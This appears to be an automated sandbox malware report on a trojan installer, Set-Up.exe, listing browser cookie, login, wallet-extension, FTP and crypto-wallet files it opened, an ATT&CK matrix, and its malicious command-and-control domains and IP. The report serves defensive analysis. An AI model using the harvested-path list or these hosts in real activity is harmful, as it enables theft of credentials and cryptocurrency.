              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Set-Up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1940402195.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1937265688.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-Up.exe PID: 7352, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Set-Up.exe PID: 7352, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS3
              Process Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Set-Up.exe5%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://skatestringje.click/100%Avira URL Cloudmalware
              https://skatestringje.click/api/100%Avira URL Cloudmalware
              skatestringje.click100%Avira URL Cloudmalware
              https://skatestringje.click/apiw100%Avira URL Cloudmalware
              https://skatestringje.click/bu100%Avira URL Cloudmalware
              https://skatestringje.click/apin100%Avira URL Cloudmalware
              https://skatestringje.click:443/api100%Avira URL Cloudmalware
              https://skatestringje.click/api100%Avira URL Cloudmalware
              https://support.microsof0%Avira URL Cloudsafe
              https://skatestringje.click/u100%Avira URL Cloudmalware
              https://skatestringje.click/pi100%Avira URL Cloudmalware
              https://skatestringje.click/$100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              skatestringje.click
              104.21.75.15
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                kickykiduz.latfalse
                  high
                  bloodyswif.latfalse
                    high
                    https://skatestringje.click/apitrue
                    • Avira URL Cloud: malware
                    unknown
                    savorraiykj.latfalse
                      high
                      miniatureyu.latfalse
                        high
                        skatestringje.clicktrue
                        • Avira URL Cloud: malware
                        unknown
                        washyceehsu.latfalse
                          high
                          finickypwk.latfalse
                            high
                            shoefeatthe.latfalse
                              high
                              leggelatez.latfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabSet-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.rootca1.amazontrust.com/rootca1.crl0Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://skatestringje.click/apinSet-Up.exe, 00000000.00000003.1937265688.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://ocsp.rootca1.amazontrust.com0:Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://skatestringje.click/api/Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-Up.exe, 00000000.00000003.1888558150.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1903083251.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1888660135.0000000003A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://skatestringje.click:443/apiSet-Up.exe, 00000000.00000003.1964907434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-Up.exe, 00000000.00000003.1888558150.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1903083251.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1888660135.0000000003A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://skatestringje.click/buSet-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1964907434.0000000000AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://skatestringje.click/apiwSet-Up.exe, 00000000.00000003.1982707055.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000002.1984463320.0000000000B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://ac.ecosia.org/autocomplete?q=Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://skatestringje.click/Set-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1964907434.0000000000AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://skatestringje.click/uSet-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://x1.c.lencr.org/0Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSet-Up.exe, 00000000.00000003.1888660135.0000000003A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.microsofSet-Up.exe, 00000000.00000003.1888558150.0000000003A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-Up.exe, 00000000.00000003.1921133389.0000000003A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://skatestringje.click/$Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSet-Up.exe, 00000000.00000003.1888660135.0000000003A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/products/firefoxgro.allSet-Up.exe, 00000000.00000003.1922938061.0000000003B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-Up.exe, 00000000.00000003.1887236361.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1887345081.0000000003A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://skatestringje.click/piSet-Up.exe, 00000000.00000003.1982707055.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, Set-Up.exe, 00000000.00000003.1885880152.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.75.15
